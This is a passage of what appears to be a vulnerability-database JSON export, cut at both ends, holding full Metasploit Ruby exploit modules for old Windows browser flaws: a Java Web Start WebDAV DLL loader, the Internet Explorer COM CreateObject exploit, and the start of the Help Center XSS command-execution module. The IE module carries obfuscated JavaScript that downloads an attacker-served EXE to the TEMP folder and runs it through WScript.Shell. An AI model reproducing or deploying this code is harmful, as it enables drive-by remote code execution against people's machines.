path to use.' ])\r\n ], self.class)\r\n end\r\n\r\n\r\n def auto_target(cli, request)\r\n agent = request.headers['User-Agent']\r\n\r\n ret = nil\r\n #print_status(\"Agent: #{agent}\")\r\n # Check for MSIE and/or WebDAV redirector requests\r\n if agent =~ /(Windows NT (5|6)\\.(0|1|2)|MiniRedir\\/(5|6)\\.(0|1|2))/\r\n ret = targets[1]\r\n elsif agent =~ /MSIE (6|7|8)\\.0/\r\n ret = targets[1]\r\n else\r\n print_status(\"Unknown User-Agent #{agent}\")\r\n end\r\n\r\n ret\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n\r\n # For this exploit, this does little besides ensures the user agent is a recognized one..\r\n mytarget = target\r\n if target.name == 'Automatic'\r\n mytarget = auto_target(cli, request)\r\n if (not mytarget)\r\n send_not_found(cli)\r\n return\r\n end\r\n end\r\n\r\n # Special case to process OPTIONS for /\r\n if (request.method == 'OPTIONS' and request.uri == '/')\r\n process_options(cli, request, mytarget)\r\n return\r\n end\r\n\r\n # Discard requests for ico files\r\n if (request.uri =~ /\\.ico$/i)\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n # If there is no subdirectory in the request, we need to redirect.\r\n if (request.uri == '/') or not (request.uri =~ /\\/([^\\/]+)\\//)\r\n if (request.uri == '/')\r\n subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'\r\n else\r\n subdir = request.uri + '/'\r\n end\r\n print_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\")\r\n send_redirect(cli, subdir)\r\n return\r\n else\r\n share_name = $1\r\n end\r\n\r\n # dispatch WebDAV requests based on method first\r\n case request.method\r\n when 'OPTIONS'\r\n process_options(cli, request, mytarget)\r\n\r\n when 'PROPFIND'\r\n process_propfind(cli, request, mytarget)\r\n\r\n when 'GET'\r\n process_get(cli, request, mytarget, share_name)\r\n\r\n when 'PUT'\r\n print_status(\"Sending 404 for PUT #{request.uri} ...\")\r\n send_not_found(cli)\r\n\r\n else\r\n print_error(\"Unexpected request method encountered: #{request.method}\")\r\n\r\n end\r\n\r\n end\r\n\r\n #\r\n # GET requests\r\n #\r\n def process_get(cli, request, target, share_name)\r\n\r\n print_status(\"Responding to \\\"GET #{request.uri}\\\" request\")\r\n # dispatch based on extension\r\n if (request.uri =~ /\\.dll$/i)\r\n #\r\n # DLL requests sent by IE and the WebDav Mini-Redirector\r\n #\r\n print_status(\"Sending DLL\")\r\n\r\n # Re-generate the payload\r\n return if ((p = regenerate_payload(cli)) == nil)\r\n\r\n # Generate a DLL based on the payload\r\n dll_data = generate_payload_dll({ :code => p.encoded })\r\n\r\n # Send it :)\r\n send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })\r\n\r\n else\r\n #\r\n # HTML requests sent by IE and Firefox\r\n #\r\n # This could probably use the Host header from the request\r\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\r\n # Always prepare the UNC path, even if we dont use it for this request...\r\n if (datastore['UNCPATH'])\r\n unc = datastore['UNCPATH'].dup\r\n else\r\n unc = \"\\\\\\\\\" + my_host + \"\\\\\" + share_name\r\n end\r\n jnlp = \"-J-XXaltjvm=\" + unc + \" -Xnosplash \" + rand_text_alphanumeric(8+rand(8)) + \".jnlp\"\r\n docbase = rand_text_alphanumeric(8+rand(8))\r\n\r\n # Provide the corresponding HTML page...\r\n if (request.uri =~ /\\.shtml/i)\r\n print_status(\"Sending JS version HTML\")\r\n # Javascript version...\r\n var_str = rand_text_alpha(8+rand(8))\r\n var_obj = rand_text_alpha(8+rand(8))\r\n var_obj2 = rand_text_alpha(8+rand(8))\r\n var_obj3 = rand_text_alpha(8+rand(8))\r\n js_jnlp = \"http: \"\r\n js_jnlp << jnlp.dup.gsub(\"\\\\\", \"\\\\\\\\\\\\\\\\\") # jeez\r\n\r\n # The 8ad.. CLSID doesn't support the launch method ...\r\n #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'\r\n clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'\r\n html = %Q|<html>\r\n<body>Please wait...\r\n<script language=\"javascript\">\r\nvar #{var_str} = \"#{js_jnlp}\";\r\nif (window.navigator.appName == \"Microsoft Internet Explorer\") {\r\nvar #{var_obj} = document.createElement(\"OBJECT\");\r\n#{var_obj}.classid = \"clsid:#{clsid}\";\r\n#{var_obj}.launch(#{var_str});\r\n} else {\r\ntry {\r\nvar #{var_obj2} = document.createElement(\"OBJECT\");\r\n#{var_obj2}.type = \"application/npruntime-scriptable-plugin;deploymenttoolkit\";\r\ndocument.body.appendChild(#{var_obj2});\r\n#{var_obj2}.launch(#{var_str});\r\n} catch (e) {\r\nvar #{var_obj3} = document.createElement(\"OBJECT\");\r\n#{var_obj3}.type = \"application/java-deployment-toolkit\";\r\ndocument.body.appendChild(#{var_obj3});\r\n#{var_obj3}.launch(#{var_str});\r\n}\r\n}\r\n</script>\r\n</body>\r\n</html>\r\n|\r\n elsif (request.uri =~ /\\.htm/i)\r\n print_status(\"Sending non-JS version HTML\")\r\n clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ]\r\n clsid = clsids[rand(clsids.length)]\r\n html = %Q|<html>\r\n<body>Please wait...\r\n<object id=\"#{var_obj}\" classid=\"clsid:#{clsid}\"\r\nwidth=\"0\" height=\"0\">\r\n<PARAM name=\"launchjnlp\" value=\"#{jnlp}\">\r\n<PARAM name=\"docbase\" value=\"#{docbase}\">\r\n</object>\r\n<embed type=\"application/x-java-applet\"\r\nwidth=\"0\" height=\"0\"\r\nlaunchjnlp=\"#{jnlp}\"\r\ndocbase=\"#{docbase}\"\r\n/>\r\n</body>\r\n</html>\r\n|\r\n else\r\n print_status(\"Sending js detection HTML\")\r\n\r\n # NOTE: The JS version is preferred to the HTML version since it works on more JRE versions\r\n js_uri = rand_text_alphanumeric(8+rand(8)) + \".shtml\"\r\n no_js_uri = rand_text_alphanumeric(8+rand(8)) + \".htm\"\r\n\r\n html = %Q|<html>\r\n<head>\r\n<meta http-equiv=\"refresh\" content=\"2;#{no_js_uri}\" />\r\n</head>\r\n<body>\r\nPlease wait...\r\n<script language=\"javascript\">\r\ndocument.location = \"#{js_uri}\";\r\n</script>\r\n</body>\r\n</html>\r\n|\r\n # end of detection html\r\n end\r\n\r\n send_response_html(cli, html,\r\n {\r\n 'Content-Type' => 'text/html',\r\n 'Pragma' => 'no-cache'\r\n })\r\n end\r\n\r\n end\r\n\r\n #\r\n # OPTIONS requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_options(cli, request, target)\r\n print_status(\"Responding to WebDAV \\\"OPTIONS #{request.uri}\\\" request\")\r\n headers = {\r\n #'DASL' => '<DAV:sql>',\r\n #'DAV' => '1, 2',\r\n 'Allow' => 'OPTIONS, GET, PROPFIND',\r\n 'Public' => 'OPTIONS, GET, PROPFIND'\r\n }\r\n send_response(cli, '', headers)\r\n end\r\n\r\n\r\n #\r\n # PROPFIND requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_propfind(cli, request, target)\r\n path = request.uri\r\n print_status(\"Received WebDAV \\\"PROPFIND #{request.uri}\\\" request\")\r\n body = ''\r\n\r\n if (path =~ /\\.dll$/i)\r\n # Response for the DLL\r\n print_status(\"Sending DLL multistatus for #{path} ...\")\r\n#<lp1:getcontentlength>45056</lp1:getcontentlength>\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\r\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag>\r\n<lp2:executable>F</lp2:executable>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n elsif (path =~ /\\/$/) or (not path.sub('/', '').index('/'))\r\n # Response for anything else (generally just /)\r\n print_status(\"Sending directory multistatus for #{path} ...\")\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\r\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n else\r\n print_status(\"Sending 404 for #{path} ...\")\r\n send_not_found(cli)\r\n return\r\n\r\n end\r\n\r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml'\r\n cli.send_response(resp)\r\n end\r\n\r\n\r\n #\r\n # Make sure we're on the right port/path to support WebDAV\r\n #\r\n def exploit\r\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\r\n end\r\n\r\n super\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41700/"}, {"lastseen": "2016-02-02T00:08:26", "description": "Internet Explorer COM CreateObject Code Execution. CVE-2006-0003,CVE-2006-4704. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - COM CreateObject Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4704", "CVE-2006-0003"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16561", "href": "https://www.exploit-db.com/exploits/16561/", "sourceData": "##\r\n# $Id: ie_createobject.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Seh\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t# In badly misconfigured situations, IE7 and 8 could be vulnerable to\r\n\t\t# this, but by default they throw an ugly popup that stops all script\r\n\t\t# execution until the user deals with it and aborts everything if they\r\n\t\t# click \"no\". Not worth the risk of being unable to try more recent\r\n\t\t# exploits. Make sure service packs on top of 6.0 are considered less\r\n\t\t# than the max by setting to 6.1 (which doesn't really exist).\r\n\t\t:ua_maxver => \"6.1\",\r\n\t\t:javascript => true,\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:vuln_test => 'CreateObject',\r\n\t\t:classid =>\r\n\t\t\t[\r\n\t\t\t\t\t'{BD96C556-65A3-11D0-983A-00C04FC29E36}',\r\n\t\t\t\t\t'{BD96C556-65A3-11D0-983A-00C04FC29E30}',\r\n\t\t\t\t\t'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',\r\n\t\t\t\t\t'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',\r\n\t\t\t\t\t'{6414512B-B978-451D-A0D8-FCFDF33E833C}',\r\n\t\t\t\t\t'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',\r\n\t\t\t\t\t'{639F725F-1B2D-4831-A9FD-874847682010}',\r\n\t\t\t\t\t'{BA018599-1DB3-44f9-83B4-461454C84BF8}',\r\n\t\t\t\t\t'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',\r\n\t\t\t\t\t'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',\r\n\t\t\t\t\t'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',\r\n\t\t\t\t\t'{0006F033-0000-0000-C000-000000000046}',\r\n\t\t\t\t\t'{0006F03A-0000-0000-C000-000000000046}',\r\n\t\t\t],\r\n\t\t#:rank => ExcellentRanking # reliable exe writer\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Internet Explorer COM CreateObject Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a generic code execution vulnerability in Internet\r\n\t\t\t\tExplorer by abusing vulnerable ActiveX objects.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# MDAC\r\n\t\t\t\t\t[ 'MSB', 'MS06-014' ],\r\n\t\t\t\t\t[ 'CVE', '2006-0003' ],\r\n\t\t\t\t\t[ 'OSVDB', '24517' ],\r\n\t\t\t\t\t# WMI Object Broker\r\n\t\t\t\t\t[ 'MSB', 'MS06-073' ],\r\n\t\t\t\t\t[ 'CVE', '2006-4704' ],\r\n\t\t\t\t\t[ 'OSVDB', '30155' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\r\n\t\t\t\t\t# Patched\r\n\t\t\t\t\t[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],\r\n\t\t\t\t\t# Found in mpack\r\n\t\t\t\t\t[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],\r\n\r\n\t\t\t\t\t# Patched\r\n\t\t\t\t\t[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],\r\n\r\n\t\t\t\t\t# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)\r\n\t\t\t\t\t[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],\r\n\r\n\t\t\t\t\t# Visual Studio components, not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The controls below can launch the \"installing component\" dialogs...\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t# Not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],\r\n\r\n\t\t\t\t\t# Not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],\r\n\r\n\t\t\t\t\t# Found exploitable in the wild (no details)\r\n\t\t\t\t\t[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Apr 11 2006'))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tif (request.uri.match(/payload/))\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\t\t\tprint_status(\"Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Build out the HTML response page\r\n\t\tvar_html = rand_text_alpha(rand(30)+2)\r\n\t\tvar_func_exploit = rand_text_alpha(rand(30)+2);\r\n\t\tvar_func_go = rand_text_alpha(rand(30)+2);\r\n\t\tvar_func_createo = rand_text_alpha(rand(30)+2);\r\n\t\tvar_exe_name = rand_text_alpha(rand(30)+2);\r\n\t\tvar_objects = ''\r\n\r\n\t\t# Build the object list based on target selection\r\n\t\tif (target.name == 'Automatic')\r\n\t\t\ttargets.each do |t|\r\n\t\t\t\tnext if not t['CLSID']\r\n\t\t\t\tvar_objects += t['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tvar_objects += target['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\r\n\t\tend\r\n\r\n\r\n\t\tcontent = %Q^\r\n<html><head><title></title>\r\n<script language=\"javascript\">\r\n\r\nfunction #{var_func_createo}( o , n ) {\r\n\tvar r = null;\r\n\r\n\ttry { eval(\"r=o\" + \".C\" + \"re\" + \"ate\" + \"Ob\" + \"je\" + \"ct(n)\" ) }catch(e){}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'','')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"je\" + \"ct('',n)\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n,'')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n)\" ) }catch(e){}\r\n\t}\r\n\r\n\treturn( r );\r\n}\r\n\r\nfunction #{var_func_go}( a ) {\r\n\r\n\tvar s = #{var_func_createo}( a, \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" );\r\n\r\n\tvar o = #{var_func_createo}( a, \"A\" + \"DO\" + \"D\" + \"B.S\" + \"tr\" + \"eam\" );\r\n\r\n\tvar e = s.Environment( \"P\" + \"ro\" + \"ce\" + \"ss\" );\r\n\r\n\r\n\tvar url = document.location + '/p' + 'ay' + 'lo' + 'ad';\r\n\tvar xml = null;\r\n\tvar bin = e.Item( \"T\" + \"E\" + \"M\" + \"P\" ) + \"\\\\\\\\#{var_exe_name}\" + \".e\" + \"xe\";\r\n\tvar dat;\r\n\r\n\ttry { xml=new XMLHttpRequest(); }\r\n\tcatch(e) {\r\n\t\ttry { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }\r\n\t\tcatch(e) {\r\n\t\t\txml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\r\n\t\t}\r\n\t}\r\n\r\n\tif (! xml) {\r\n\t\treturn(0);\r\n\t}\r\n\r\n\txml.open(\"GET\", url, false);\r\n\txml.send(null);\r\n\tdat = xml.responseBody;\r\n\r\n\to.Type = 1 ;\r\n\to.Mode = 3 ;\r\n\to.Open ( ) ;\r\n\to.Write ( dat ) ;\r\n\to.SaveToFile ( bin, 2) ;\r\n\r\n\ts.Run ( bin , 0 );\r\n}\r\n\r\nfunction #{var_func_exploit}( ) {\r\n\tvar i = 0;\r\n\tvar t = new Array( #{var_objects} null );\r\n\r\n\twhile (t[i]) {\r\n\t\tvar a = null;\r\n\r\n\t\tif (t[i].substring(0,1) == '{') {\r\n\t\t\ta = document.createElement(\"object\");\r\n\t\t\ta.setAttribute(\"cl\" + \"as\" + \"sid\", \"cl\" + \"s\" + \"id\" +\":\" + t[i].substring( 1, t[i].length - 1 ) ) ;\r\n\t\t} else {\r\n\t\t\ttry { a = new ActiveXObject(t[i]); } catch(e){}\r\n\t\t}\r\n\r\n\t\tif (a) {\r\n\t\t\ttry {\r\n\t\t\t\tvar b = #{var_func_createo}( a , \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" ) ;\r\n\t\t\t\tif (b) {\r\n\t\t\t\t\t#{var_func_go}( a ) ;\r\n\t\t\t\t\treturn(0) ;\r\n\t\t\t\t}\r\n\t\t\t} catch(e){\r\n\t\t\t}\r\n\t\t}\r\n\t\ti++;\r\n\t}\r\n}\r\n</script>\r\n</head>\r\n<body onload='#{var_func_exploit}()'>\r\n#{var_html}\r\n</body>\r\n</html>\r\n\r\n^\r\n\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16561/"}], "metasploit": [{"lastseen": "2020-08-12T22:07:19", "description": "Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme \"hcp\". Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to \"none\" or \"player\". This module creates a WebDAV service from which the payload is copied to the victim machine.\n", "published": "2010-07-13T19:30:47", "type": "metasploit", "title": "Microsoft Help Center XSS and Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2019-05-23T12:01:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS10_042_HELPCTR_XSS_CMD_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t\t=> 'Microsoft Help Center XSS and Command Execution',\n 'Description'\t=> %q{\n Help and Support Center is the default application provided to access online\n documentation for Microsoft Windows. Microsoft supports accessing help documents\n directly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n an error in validation of input to hcp:// combined with a local cross site\n scripting vulnerability and a specialized mechanism to launch the XSS trigger,\n arbitrary command execution can be achieved.\n\n On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n can be used to launch the exploit automatically. If IE8 and WMP11, either can\n be used to launch the attack, but both pop dialog boxes asking the user if\n execution should continue. This exploit detects if non-intrusive mechanisms are\n available and will use one if possible. In the case of both IE8 and WMP11, the\n exploit defaults to using an iframe on IE8, but is configurable by setting the\n DIALOGMECH option to \"none\" or \"player\".\n\n This module creates a WebDAV service from which the payload is copied to the\n victim machine.\n },\n 'Author'\t\t=>\n [\n 'Tavis Ormandy', # Original discovery\n 'natron' # Metasploit version\n ],\n 'License'\t\t=> MSF_LICENSE,\n 'References'\t=>\n [\n [ 'CVE', '2010-1885' ],\n [ 'OSVDB', '65264' ],\n [ 'MSB', 'MS10-042']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload'\t\t=>\n {\n 'Space'\t=> 2048,\n },\n 'Platform'\t\t=> 'win',\n 'Targets'\t\t=>\n [\n [ 'Automatic',\t{ } ]\n ],\n 'DisclosureDate' => 'Jun 09 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new(\t'SRVPORT',\t\t [ true, \"The daemon port to listen on (do not change)\", 80 ]),\n OptString.new(\t'URIPATH',\t\t [ true, \"The URI to use (do not change).\", \"/\" ]),\n OptString.new(\t'DIALOGMECH',\t [ true, \"IE8/WMP11 trigger mechanism (none, iframe, or player).\", \"iframe\"])\n ])\n\n deregister_options('SSL', 'SSLVersion') # Just for now\n end\n\n def on_request_uri(cli, request)\n\n # If there is no subdirectory in the request, we need to redirect.\n if (request.uri == '/') or not (request.uri =~ /\\/[^\\/]+\\//)\n if (request.uri == '/')\n subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'\n else\n subdir = request.uri + '/'\n end\n print_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\")\n send_redirect(cli, subdir)\n return\n end\n\n\n case request.method\n when 'OPTIONS'\n process_options(cli, request)\n when 'PROPFIND'\n process_propfind(cli, request)\n when 'GET'\n process_get(cli, request)\n else\n print_error(\"Unexpected request method encountered: #{request.method}\")\n end\n\n end\n\n def process_get(cli, request)\n\n @my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n webdav_loc = \"\\\\\\\\#{@my_host}\\\\#{@random_dir}\\\\#{@payload}\"\n @url_base = \"http://\" + @my_host\n\n if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))\n print_status \"Sending payload executable to target ...\"\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_exe({ :code => p.encoded })\n\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n if request.uri.match(/\\.gif$/)\n # \"world's smallest gif\"\n data = \"GIF89a\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\xF9\\x04\\x01\"\n data += \"\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02\\x02D\\x01\\x00;\"\n print_status \"Sending gif image to WMP\"\n send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )\n end\n\n # ASX Request Inbound\n if request.uri.match(/\\.asx$/)\n asx = %Q|<ASX VERSION=\"3.0\">\n<PARAM name=\"HTMLView\" value=\"URLBASE/STARTHELP\"/>\n<ENTRY>\n <REF href=\"URLBASE/IMGFILE\"/>\n</ENTRY>\n</ASX>\n|\n asx.gsub!(/URLBASE/, @url_base)\n asx.gsub!(/STARTHELP/, @random_dir + \"/\" + @start_help)\n asx.gsub!(/IMGFILE/, @random_dir + \"/\" + @img_file)\n print_status(\"Sending asx file\")\n send_response(cli, asx, { 'Content-Type' => 'text/html' })\n return\n end\n\n # iframe request inbound from either WMP or IE7\n if request.uri.match(/#{@start_help}/)\n\n help_html = <<-EOS\n<iframe 